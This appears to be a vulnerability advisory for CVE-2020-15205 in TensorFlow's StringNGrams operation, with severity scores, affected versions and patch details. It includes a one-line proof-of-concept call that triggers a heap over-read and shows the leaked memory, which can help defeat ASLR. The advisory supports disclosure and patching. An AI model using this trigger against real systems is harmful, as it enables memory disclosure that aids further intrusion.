CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
59.1%
The data_splits
argument of tf.raw_ops.StringNGrams
lacks validation. This allows a user to pass values that can cause heap overflow errors and even leak contents of memory
>>> tf.raw_ops.StringNGrams(data=["aa", "bb", "cc", "dd", "ee", "ff"], data_splits=[0,8], separator=" ", ngram_widths=[3], left_pad="", right_pad="", pad_width=0, preserve_short_sequences=False)
StringNGrams(ngrams=<tf.Tensor: shape=(6,), dtype=string, numpy=
array([b'aa bb cc', b'bb cc dd', b'cc dd ee', b'dd ee ff',
b'ee ff \xf4j\xa7q\x7f\x00\x00q\x00\x00\x00\x00\x00\x00\x00\xd8\x9b~\xa8q\x7f\x00',
b'ff \xf4j\xa7q\x7f\x00\x00q\x00\x00\x00\x00\x00\x00\x00\xd8\x9b~\xa8q\x7f\x00 \x9b~\xa8q\x7f\x00\x00p\xf5j\xa7q\x7f\x00\x00H\xf8j\xa7q\x7f\x00\x00\xf0\xf3\xf7\x85q\x7f\x00\x00`}\xa6\x00\x00\x00\x00\x00`~\xa6\x00\x00\x00\x00\x00\xb0~\xeb\x9bq\x7f\x00'],...
All the binary strings after ee ff
are contents from the memory stack. Since these can contain return addresses, this data leak can be used to defeat ASLR.
We have patched the issue in 0462de5b544ed4731aa2fb23946ac22c01856b80 and will release patch releases for all versions between 1.15 and 2.3.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
Vendor | Product | Version | CPE |
---|---|---|---|
* | tensorflow-gpu | 2.3.0 | cpe:2.3:a:*:tensorflow-gpu:2.3.0:*:*:*:*:*:*:* |
* | tensorflow-gpu | 2.2.0 | cpe:2.3:a:*:tensorflow-gpu:2.2.0:*:*:*:*:*:*:* |
* | tensorflow-gpu | * | cpe:2.3:a:*:tensorflow-gpu:*:*:*:*:*:*:*:* |
* | tensorflow-cpu | 2.3.0 | cpe:2.3:a:*:tensorflow-cpu:2.3.0:*:*:*:*:*:*:* |
* | tensorflow-cpu | 2.2.0 | cpe:2.3:a:*:tensorflow-cpu:2.2.0:*:*:*:*:*:*:* |
* | tensorflow-cpu | * | cpe:2.3:a:*:tensorflow-cpu:*:*:*:*:*:*:*:* |
tensorflow | tensorflow | 2.3.0 | cpe:2.3:a:tensorflow:tensorflow:2.3.0:*:*:*:*:*:*:* |
tensorflow | tensorflow | 2.2.0 | cpe:2.3:a:tensorflow:tensorflow:2.2.0:*:*:*:*:*:*:* |
tensorflow | tensorflow | * | cpe:2.3:a:tensorflow:tensorflow:*:*:*:*:*:*:*:* |
lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html
github.com/advisories/GHSA-g7p5-5759-qv46
github.com/tensorflow/tensorflow/commit/0462de5b544ed4731aa2fb23946ac22c01856b80
github.com/tensorflow/tensorflow/releases/tag/v2.3.1
github.com/tensorflow/tensorflow/security/advisories/GHSA-g7p5-5759-qv46
nvd.nist.gov/vuln/detail/CVE-2020-15205
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
59.1%